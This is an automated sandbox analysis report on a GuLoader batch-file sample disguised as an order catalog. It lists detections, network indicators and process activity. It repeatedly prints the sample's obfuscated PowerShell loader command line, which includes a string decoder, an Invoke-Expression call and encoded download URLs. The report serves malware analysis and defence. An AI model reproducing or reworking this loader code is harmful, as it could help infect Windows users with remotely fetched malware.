Windows Analysis Report
ORDER AND CATALOG 01.bat

Overview

General Information

Sample name: ORDER AND CATALOG 01.bat
Analysis ID: 1562494
MD5: 48eb61ad0c88221857d8cf3e96d58525
SHA1: 724b144e7bbabd011ca04d0d140ede4e47e7ec71
SHA256: fa9838f5471d4c21d2f8a2f6def009de4bcfad8e5794cc0be33b31e11c5d8fb9

Detection

GuLoader
Score: 60
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Yara detected GuLoader
Suspicious powershell command line found
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
May sleep (evasive loops) to hinder dynamic analysis
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found

Classification

Source: unknown HTTPS traffic detected: 103.83.194.50:443 -> 192.168.2.16:49702 version: TLS 1.2
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic DNS traffic detected: DNS query: cohabitais.ru.com
Source: unknown Network traffic detected: HTTP traffic on port 49702 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49702
Source: C:\Windows\System32\svchost.exe File created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp
Source: C:\Windows\System32\cmd.exe Process created: Commandline size = 7526
Source: unknown Process created: Commandline size = 7550
Source: classification engine Classification label: mal60.troj.winBAT@8/7@1/38
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Roaming\Suspendibility.Lum
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7024:120:WilError_03
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Mutant created: NULL
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5232:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6864:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_2t3exdl0.jae.ps1
Source: unknown Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\ORDER AND CATALOG 01.bat" "
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=6852
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=5076
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File read: C:\Users\desktop.ini
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden ";$Pukka='Drillevorn';;$Additionstegnenes='Drftede165';;$Neri='Thebain';;$Asteroidens='Outsling';;$Daarskab='Calamopitys';;$gastons=$host.Name;function Galskaber65($Paretically){If ($gastons) {$Chemiuserzation191=5} for ($Thinkings=$Chemiuserzation191;;$Thinkings+=6){if(!$Paretically[$Thinkings]) { break }$Kondenseringerne+=$Paretically[$Thinkings]}$Kondenseringerne}function bearbejdeligste($Fagidioternes){ .($Medunderskriv) ($Fagidioternes)}$Succinctory46=Galskaber65 'RestinMediteIngm.tM.tho. Drifwelskoe hjembTelefCirreclbowleiLasereAncylnSaurut';$hjulpiskere=Galskaber65 'Inde,M Gardo s adzEkspriStrumlStr.plSliksaStrel/';$Wiggas=Galskaber65 'ElbilT,ontrlRygdksTrlso1Arn s2';$husholderisk='Egne [InvirNSu plE Pr gTTeg o.HjspnSBirdleSkg,rRTilgivDiapaI GawgCFor iEGrshoPFr boO iarii Fo onlang tUdsyrmLivsfaChartNBajonaPo.ygginoffeDo.inrElekt]Hydr :Udnyt: TidsSSk riev nfuCCnemiU K ncrUni.ei.uesttAutopySkrifpSge rr sphaO esudtOmskiOkonstcShrieoUnspelRe da= Arme$UdpumwstrewI A.ndGTeknoGStal aBu.keS';$hjulpiskere+=Galskaber65 'S bar5Forpl.Ligus0Rhapo Ganga( kultW Unw iVinstngnetadRebutoPectowM zzlsMarke H,emmNEkspoT ysse mana1Cerva0H eml.Overc0Aftwa;Pre t FrivoWtrussi Pl mn acif6 Ni h4Digre; Pela AvocaxL ftn6 Sa.o4Mesot;Blaat F gtnr D,sqv .ont:Trolo1Monoc3Revei1 sp c. 
Or m0Hyper) Jaev ReverGV ndierappocFunktkGrutno Rest/ Marc2dowha0Bivaa1Fod n0Pili.0Tivol1Redif0 Berb1Hypos Pa aF E,oti ultrGenite ForsfValuto Injux red/ Util1Krkli3 Frey1Sa.di.Afgr 0';$Vampirish=Galskaber65 ' PsycU BlacsTegneENatteR op.a-MisemaF lklGSkrmbePharyNRodenT';$Stokken=Galskaber65 'Elekth SandtNef,nt Subvp DigisHaema:Holda/ orbi/ kovsc AnsvoUsk.dhUnbuyaTiff bHype iMessatM onlaBefaliResepsanden.SilkerHaveeuKolle.Stttec UntioSiphomTecto/H ghvc,orsts HvedsSchin- ekos/degerOMerckvServeeBanker Forls lfooP eseeHovediFaeposBe.rakEc.oceMaled.Preo aUdskrskvabad Si s>DrifthOrkant Wh mtMalispNonalsImams:Frem /Met i/IndvenUsel rTegnk.FitchyRestiy Stran ulkodCaprizg oseq Pa e2 Mulc. Nonis Stuba Thed. iskcChuckoTot mmMicro/Pictuc ColugBetweiSolid_Dili,bCa diinoninnVrd.h/Lnk rOPs,udvNarc eNoni r NdrisBankfoF.rreeNonrhiU stys Lea kVideoe Unge. nisaa matrs Uns d';$Dogwinkle=Galskaber65 'Bivua>';$Medunderskriv=Galskaber65 'udskrIPlie,e,iskeX';$Overspille='secco';$Blossoms='\Suspendibility.Lum';bearbejdeligste (Galskaber65 'Sojas$MisguGAl mnl DetaOMet lBFlsenaBrierl,ugnl: Empod dskiO hegugRustnMStopkaPsychtStr kIFil iSProceMIs ndEAnathrJazzb= Rdle$AroineUpheanRevelV,tjer:CreneAForhapTristP lossDfiletAsuperTForseaForbr+Bidra$BjergbGoy,mlUnreqoSkomaSTrediSDe,mnoFlowcmVellas');bearbejdeligste (Galskaber65 'Un.lo$UnbrigClausLInforOPapirbMas.iAUn erLModfa:Tiaaro C rymRapshf,nkilAP pulNHyletgGlosaSbrunibRhkluEB,rgedFlammmAccruM .inieAnkyll GarrsForbiE NandNA,tob=Latti$OptigSStjmatKejseOBushrK nathKRes tEAflasN Spal.S uttS UntwpSig elDe,enIGlisttIconi(Grop,$Lyn hD De.roUds jG.fsenWFa rdiKj.rsNAmtsvKBruttL a ahe
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Source: unknown Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" ";$Pukka='Drillevorn';;$Additionstegnenes='Drftede165';;$Neri='Thebain';;$Asteroidens='Outsling';;$Daarskab='Calamopitys';;$gastons=$host.Name;function Galskaber65($Paretically){If ($gastons) {$Chemiuserzation191=5} for ($Thinkings=$Chemiuserzation191;;$Thinkings+=6){if(!$Paretically[$Thinkings]) { break }$Kondenseringerne+=$Paretically[$Thinkings]}$Kondenseringerne}function bearbejdeligste($Fagidioternes){ .($Medunderskriv) ($Fagidioternes)}$Succinctory46=Galskaber65 'RestinMediteIngm.tM.tho. Drifwelskoe hjembTelefCirreclbowleiLasereAncylnSaurut';$hjulpiskere=Galskaber65 'Inde,M Gardo s adzEkspriStrumlStr.plSliksaStrel/';$Wiggas=Galskaber65 'ElbilT,ontrlRygdksTrlso1Arn s2';$husholderisk='Egne [InvirNSu plE Pr gTTeg o.HjspnSBirdleSkg,rRTilgivDiapaI GawgCFor iEGrshoPFr boO iarii Fo onlang tUdsyrmLivsfaChartNBajonaPo.ygginoffeDo.inrElekt]Hydr :Udnyt: TidsSSk riev nfuCCnemiU K ncrUni.ei.uesttAutopySkrifpSge rr sphaO esudtOmskiOkonstcShrieoUnspelRe da= Arme$UdpumwstrewI A.ndGTeknoGStal aBu.keS';$hjulpiskere+=Galskaber65 'S bar5Forpl.Ligus0Rhapo Ganga( kultW Unw iVinstngnetadRebutoPectowM zzlsMarke H,emmNEkspoT ysse mana1Cerva0H eml.Overc0Aftwa;Pre t FrivoWtrussi Pl mn acif6 Ni h4Digre; Pela AvocaxL ftn6 Sa.o4Mesot;Blaat F gtnr D,sqv .ont:Trolo1Monoc3Revei1 sp c. 
Or m0Hyper) Jaev ReverGV ndierappocFunktkGrutno Rest/ Marc2dowha0Bivaa1Fod n0Pili.0Tivol1Redif0 Berb1Hypos Pa aF E,oti ultrGenite ForsfValuto Injux red/ Util1Krkli3 Frey1Sa.di.Afgr 0';$Vampirish=Galskaber65 ' PsycU BlacsTegneENatteR op.a-MisemaF lklGSkrmbePharyNRodenT';$Stokken=Galskaber65 'Elekth SandtNef,nt Subvp DigisHaema:Holda/ orbi/ kovsc AnsvoUsk.dhUnbuyaTiff bHype iMessatM onlaBefaliResepsanden.SilkerHaveeuKolle.Stttec UntioSiphomTecto/H ghvc,orsts HvedsSchin- ekos/degerOMerckvServeeBanker Forls lfooP eseeHovediFaeposBe.rakEc.oceMaled.Preo aUdskrskvabad Si s>DrifthOrkant Wh mtMalispNonalsImams:Frem /Met i/IndvenUsel rTegnk.FitchyRestiy Stran ulkodCaprizg oseq Pa e2 Mulc. Nonis Stuba Thed. iskcChuckoTot mmMicro/Pictuc ColugBetweiSolid_Dili,bCa diinoninnVrd.h/Lnk rOPs,udvNarc eNoni r NdrisBankfoF.rreeNonrhiU stys Lea kVideoe Unge. nisaa matrs Uns d';$Dogwinkle=Galskaber65 'Bivua>';$Medunderskriv=Galskaber65 'udskrIPlie,e,iskeX';$Overspille='secco';$Blossoms='\Suspendibility.Lum';bearbejdeligste (Galskaber65 'Sojas$MisguGAl mnl DetaOMet lBFlsenaBrierl,ugnl: Empod dskiO hegugRustnMStopkaPsychtStr kIFil iSProceMIs ndEAnathrJazzb= Rdle$AroineUpheanRevelV,tjer:CreneAForhapTristP lossDfiletAsuperTForseaForbr+Bidra$BjergbGoy,mlUnreqoSkomaSTrediSDe,mnoFlowcmVellas');bearbejdeligste (Galskaber65 'Un.lo$UnbrigClausLInforOPapirbMas.iAUn erLModfa:Tiaaro C rymRapshf,nkilAP pulNHyletgGlosaSbrunibRhkluEB,rgedFlammmAccruM .inieAnkyll GarrsForbiE NandNA,tob=Latti$OptigSStjmatKejseOBushrK nathKRes tEAflasN Spal.S uttS UntwpSig elDe,enIGlisttIconi(Grop,$Lyn hD De.roUds jG.fsenWFa rdi
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

Data Obfuscation

Source: Yara match File source: 0000000B.00000002.2462762606.000000000E361000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.1300165087.000002D446AB3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.2462628571.0000000009B40000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.2438738602.0000000005C84000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden ";$Pukka='Drillevorn';;$Additionstegnenes='Drftede165';;$Neri='Thebain';;$Asteroidens='Outsling';;$Daarskab='Calamopitys';;$gastons=$host.Name;function Galskaber65($Paretically){If ($gastons) {$Chemiuserzation191=5} for ($Thinkings=$Chemiuserzation191;;$Thinkings+=6){if(!$Paretically[$Thinkings]) { break }$Kondenseringerne+=$Paretically[$Thinkings]}$Kondenseringerne}function bearbejdeligste($Fagidioternes){ .($Medunderskriv) ($Fagidioternes)}$Succinctory46=Galskaber65 'RestinMediteIngm.tM.tho. Drifwelskoe hjembTelefCirreclbowleiLasereAncylnSaurut';$hjulpiskere=Galskaber65 'Inde,M Gardo s adzEkspriStrumlStr.plSliksaStrel/';$Wiggas=Galskaber65 'ElbilT,ontrlRygdksTrlso1Arn s2';$husholderisk='Egne [InvirNSu plE Pr gTTeg o.HjspnSBirdleSkg,rRTilgivDiapaI GawgCFor iEGrshoPFr boO iarii Fo onlang tUdsyrmLivsfaChartNBajonaPo.ygginoffeDo.inrElekt]Hydr :Udnyt: TidsSSk riev nfuCCnemiU K ncrUni.ei.uesttAutopySkrifpSge rr sphaO esudtOmskiOkonstcShrieoUnspelRe da= Arme$UdpumwstrewI A.ndGTeknoGStal aBu.keS';$hjulpiskere+=Galskaber65 'S bar5Forpl.Ligus0Rhapo Ganga( kultW Unw iVinstngnetadRebutoPectowM zzlsMarke H,emmNEkspoT ysse mana1Cerva0H eml.Overc0Aftwa;Pre t FrivoWtrussi Pl mn acif6 Ni h4Digre; Pela AvocaxL ftn6 Sa.o4Mesot;Blaat F gtnr D,sqv .ont:Trolo1Monoc3Revei1 sp c. 
Or m0Hyper) Jaev ReverGV ndierappocFunktkGrutno Rest/ Marc2dowha0Bivaa1Fod n0Pili.0Tivol1Redif0 Berb1Hypos Pa aF E,oti ultrGenite ForsfValuto Injux red/ Util1Krkli3 Frey1Sa.di.Afgr 0';$Vampirish=Galskaber65 ' PsycU BlacsTegneENatteR op.a-MisemaF lklGSkrmbePharyNRodenT';$Stokken=Galskaber65 'Elekth SandtNef,nt Subvp DigisHaema:Holda/ orbi/ kovsc AnsvoUsk.dhUnbuyaTiff bHype iMessatM onlaBefaliResepsanden.SilkerHaveeuKolle.Stttec UntioSiphomTecto/H ghvc,orsts HvedsSchin- ekos/degerOMerckvServeeBanker Forls lfooP eseeHovediFaeposBe.rakEc.oceMaled.Preo aUdskrskvabad Si s>DrifthOrkant Wh mtMalispNonalsImams:Frem /Met i/IndvenUsel rTegnk.FitchyRestiy Stran ulkodCaprizg oseq Pa e2 Mulc. Nonis Stuba Thed. iskcChuckoTot mmMicro/Pictuc ColugBetweiSolid_Dili,bCa diinoninnVrd.h/Lnk rOPs,udvNarc eNoni r NdrisBankfoF.rreeNonrhiU stys Lea kVideoe Unge. nisaa matrs Uns d';$Dogwinkle=Galskaber65 'Bivua>';$Medunderskriv=Galskaber65 'udskrIPlie,e,iskeX';$Overspille='secco';$Blossoms='\Suspendibility.Lum';bearbejdeligste (Galskaber65 'Sojas$MisguGAl mnl DetaOMet lBFlsenaBrierl,ugnl: Empod dskiO hegugRustnMStopkaPsychtStr kIFil iSProceMIs ndEAnathrJazzb= Rdle$AroineUpheanRevelV,tjer:CreneAForhapTristP lossDfiletAsuperTForseaForbr+Bidra$BjergbGoy,mlUnreqoSkomaSTrediSDe,mnoFlowcmVellas');bearbejdeligste (Galskaber65 'Un.lo$UnbrigClausLInforOPapirbMas.iAUn erLModfa:Tiaaro C rymRapshf,nkilAP pulNHyletgGlosaSbrunibRhkluEB,rgedFlammmAccruM .inieAnkyll GarrsForbiE NandNA,tob=Latti$OptigSStjmatKejseOBushrK nathKRes tEAflasN Spal.S uttS UntwpSig elDe,enIGlisttIconi(Grop,$Lyn hD De.roUds jG.fsenWFa rdiKj.rsNAmtsvKBruttL a ahe
Source: unknown Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" ";$Pukka='Drillevorn';;$Additionstegnenes='Drftede165';;$Neri='Thebain';;$Asteroidens='Outsling';;$Daarskab='Calamopitys';;$gastons=$host.Name;function Galskaber65($Paretically){If ($gastons) {$Chemiuserzation191=5} for ($Thinkings=$Chemiuserzation191;;$Thinkings+=6){if(!$Paretically[$Thinkings]) { break }$Kondenseringerne+=$Paretically[$Thinkings]}$Kondenseringerne}function bearbejdeligste($Fagidioternes){ .($Medunderskriv) ($Fagidioternes)}$Succinctory46=Galskaber65 'RestinMediteIngm.tM.tho. Drifwelskoe hjembTelefCirreclbowleiLasereAncylnSaurut';$hjulpiskere=Galskaber65 'Inde,M Gardo s adzEkspriStrumlStr.plSliksaStrel/';$Wiggas=Galskaber65 'ElbilT,ontrlRygdksTrlso1Arn s2';$husholderisk='Egne [InvirNSu plE Pr gTTeg o.HjspnSBirdleSkg,rRTilgivDiapaI GawgCFor iEGrshoPFr boO iarii Fo onlang tUdsyrmLivsfaChartNBajonaPo.ygginoffeDo.inrElekt]Hydr :Udnyt: TidsSSk riev nfuCCnemiU K ncrUni.ei.uesttAutopySkrifpSge rr sphaO esudtOmskiOkonstcShrieoUnspelRe da= Arme$UdpumwstrewI A.ndGTeknoGStal aBu.keS';$hjulpiskere+=Galskaber65 'S bar5Forpl.Ligus0Rhapo Ganga( kultW Unw iVinstngnetadRebutoPectowM zzlsMarke H,emmNEkspoT ysse mana1Cerva0H eml.Overc0Aftwa;Pre t FrivoWtrussi Pl mn acif6 Ni h4Digre; Pela AvocaxL ftn6 Sa.o4Mesot;Blaat F gtnr D,sqv .ont:Trolo1Monoc3Revei1 sp c. 
Or m0Hyper) Jaev ReverGV ndierappocFunktkGrutno Rest/ Marc2dowha0Bivaa1Fod n0Pili.0Tivol1Redif0 Berb1Hypos Pa aF E,oti ultrGenite ForsfValuto Injux red/ Util1Krkli3 Frey1Sa.di.Afgr 0';$Vampirish=Galskaber65 ' PsycU BlacsTegneENatteR op.a-MisemaF lklGSkrmbePharyNRodenT';$Stokken=Galskaber65 'Elekth SandtNef,nt Subvp DigisHaema:Holda/ orbi/ kovsc AnsvoUsk.dhUnbuyaTiff bHype iMessatM onlaBefaliResepsanden.SilkerHaveeuKolle.Stttec UntioSiphomTecto/H ghvc,orsts HvedsSchin- ekos/degerOMerckvServeeBanker Forls lfooP eseeHovediFaeposBe.rakEc.oceMaled.Preo aUdskrskvabad Si s>DrifthOrkant Wh mtMalispNonalsImams:Frem /Met i/IndvenUsel rTegnk.FitchyRestiy Stran ulkodCaprizg oseq Pa e2 Mulc. Nonis Stuba Thed. iskcChuckoTot mmMicro/Pictuc ColugBetweiSolid_Dili,bCa diinoninnVrd.h/Lnk rOPs,udvNarc eNoni r NdrisBankfoF.rreeNonrhiU stys Lea kVideoe Unge. nisaa matrs Uns d';$Dogwinkle=Galskaber65 'Bivua>';$Medunderskriv=Galskaber65 'udskrIPlie,e,iskeX';$Overspille='secco';$Blossoms='\Suspendibility.Lum';bearbejdeligste (Galskaber65 'Sojas$MisguGAl mnl DetaOMet lBFlsenaBrierl,ugnl: Empod dskiO hegugRustnMStopkaPsychtStr kIFil iSProceMIs ndEAnathrJazzb= Rdle$AroineUpheanRevelV,tjer:CreneAForhapTristP lossDfiletAsuperTForseaForbr+Bidra$BjergbGoy,mlUnreqoSkomaSTrediSDe,mnoFlowcmVellas');bearbejdeligste (Galskaber65 'Un.lo$UnbrigClausLInforOPapirbMas.iAUn erLModfa:Tiaaro C rymRapshf,nkilAP pulNHyletgGlosaSbrunibRhkluEB,rgedFlammmAccruM .inieAnkyll GarrsForbiE NandNA,tob=Latti$OptigSStjmatKejseOBushrK nathKRes tEAflasN Spal.S uttS UntwpSig elDe,enIGlisttIconi(Grop,$Lyn hD De.roUds jG.fsenWFa rdi
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 9274
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 676
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 2665
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 7214
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6840 Thread sleep count: 9274 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6840 Thread sleep count: 676 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7072 Thread sleep time: -1844674407370954s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 6304 Thread sleep time: -30000s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3704 Thread sleep count: 2665 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4888 Thread sleep count: 7214 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6440 Thread sleep time: -1844674407370954s >= -30000s
Source: C:\Windows\System32\svchost.exe File opened: PhysicalDrive0
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: unknown Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" ";$pukka='drillevorn';;$additionstegnenes='drftede165';;$neri='thebain';;$asteroidens='outsling';;$daarskab='calamopitys';;$gastons=$host.name;function galskaber65($paretically){if ($gastons) {$chemiuserzation191=5} for ($thinkings=$chemiuserzation191;;$thinkings+=6){if(!$paretically[$thinkings]) { break }$kondenseringerne+=$paretically[$thinkings]}$kondenseringerne}function bearbejdeligste($fagidioternes){ .($medunderskriv) ($fagidioternes)}$succinctory46=galskaber65 'restinmediteingm.tm.tho. drifwelskoe hjembtelefcirreclbowleilasereancylnsaurut';$hjulpiskere=galskaber65 'inde,m gardo s adzekspristrumlstr.plsliksastrel/';$wiggas=galskaber65 'elbilt,ontrlrygdkstrlso1arn s2';$husholderisk='egne [invirnsu ple pr gtteg o.hjspnsbirdleskg,rrtilgivdiapai gawgcfor iegrshopfr boo iarii fo onlang tudsyrmlivsfachartnbajonapo.ygginoffedo.inrelekt]hydr :udnyt: tidsssk riev nfuccnemiu k ncruni.ei.uesttautopyskrifpsge rr sphao esudtomskiokonstcshrieounspelre da= arme$udpumwstrewi a.ndgteknogstal abu.kes';$hjulpiskere+=galskaber65 's bar5forpl.ligus0rhapo ganga( kultw unw ivinstngnetadrebutopectowm zzlsmarke h,emmnekspot ysse mana1cerva0h eml.overc0aftwa;pre t frivowtrussi pl mn acif6 ni h4digre; pela avocaxl ftn6 sa.o4mesot;blaat f gtnr d,sqv .ont:trolo1monoc3revei1 sp c. 
or m0hyper) jaev revergv ndierappocfunktkgrutno rest/ marc2dowha0bivaa1fod n0pili.0tivol1redif0 berb1hypos pa af e,oti ultrgenite forsfvaluto injux red/ util1krkli3 frey1sa.di.afgr 0';$vampirish=galskaber65 ' psycu blacstegneenatter op.a-misemaf lklgskrmbepharynrodent';$stokken=galskaber65 'elekth sandtnef,nt subvp digishaema:holda/ orbi/ kovsc ansvousk.dhunbuyatiff bhype imessatm onlabefaliresepsanden.silkerhaveeukolle.stttec untiosiphomtecto/h ghvc,orsts hvedsschin- ekos/degeromerckvserveebanker forls lfoop eseehovedifaeposbe.rakec.ocemaled.preo audskrskvabad si s>drifthorkant wh mtmalispnonalsimams:frem /met i/indvenusel rtegnk.fitchyrestiy stran ulkodcaprizg oseq pa e2 mulc. nonis stuba thed. iskcchuckotot mmmicro/pictuc colugbetweisolid_dili,bca diinoninnvrd.h/lnk rops,udvnarc enoni r ndrisbankfof.rreenonrhiu stys lea kvideoe unge. nisaa matrs uns d';$dogwinkle=galskaber65 'bivua>';$medunderskriv=galskaber65 'udskriplie,e,iskex';$overspille='secco';$blossoms='\suspendibility.lum';bearbejdeligste (galskaber65 'sojas$misgugal mnl detaomet lbflsenabrierl,ugnl: empod dskio hegugrustnmstopkapsychtstr kifil isprocemis ndeanathrjazzb= rdle$aroineupheanrevelv,tjer:creneaforhaptristp lossdfiletasupertforseaforbr+bidra$bjergbgoy,mlunreqoskomastredisde,mnoflowcmvellas');bearbejdeligste (galskaber65 'un.lo$unbrigclauslinforopapirbmas.iaun erlmodfa:tiaaro c rymrapshf,nkilap pulnhyletgglosasbrunibrhklueb,rgedflammmaccrum .inieankyll garrsforbie nandna,tob=latti$optigsstjmatkejseobushrk nathkres teaflasn spal.s utts untwpsig elde,eniglistticoni(grop,$lyn hd de.rouds jg.fsenwfa rdi
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
